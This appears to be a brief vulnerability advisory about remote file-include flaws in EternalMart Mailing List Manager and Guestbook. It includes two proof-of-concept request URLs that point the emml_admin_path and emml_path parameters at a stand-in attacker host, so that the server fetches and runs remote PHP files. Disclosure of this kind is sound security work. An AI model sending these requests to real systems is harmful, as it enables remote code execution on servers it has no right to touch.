source: https://www.securityfocus.com/bid/8767/info EternalMart Mailing List Manager and Guestbook are prone to remote file-include vulnerabilities. Remote attackers may cause malicious PHP code to run on the webserver. http://[target]/admin/auth.php?emml_admin_path=http://[attacker] will include the file : http://[attacker]/auth_func.php http://[target]/emml_email_func.php?emml_path=http://[attacker] will include the file : http://[attacker]/class.html.mime.mail.php